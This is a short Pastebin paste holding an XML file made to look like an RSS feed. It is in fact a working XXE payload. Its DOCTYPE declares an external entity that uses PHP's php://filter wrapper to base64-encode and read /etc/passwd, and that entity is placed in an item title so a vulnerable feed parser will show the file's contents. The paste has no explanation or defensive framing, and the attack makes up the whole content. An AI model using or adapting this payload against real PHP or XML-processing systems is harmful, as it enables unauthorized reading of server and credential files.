TheGreenOfficial

Untitled

Feb 6th, 2026
11
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.46 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE rss [
  3. <!ENTITY xxe SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd">
  4. ]>
  5. <rss version="2.0">
  6. <channel>
  7. <title>Test RSS</title>
  8. <link>https://example.com</link>
  9. <description>Test Description</description>
  10. <item>
  11. <title>&xxe;</title>
  12. <link>https://example.com/item</link>
  13. <description>Item description</description>
  14. </item>
  15. </channel>
  16. </rss>
  17.  
Add Comment
Please, Sign In to add comment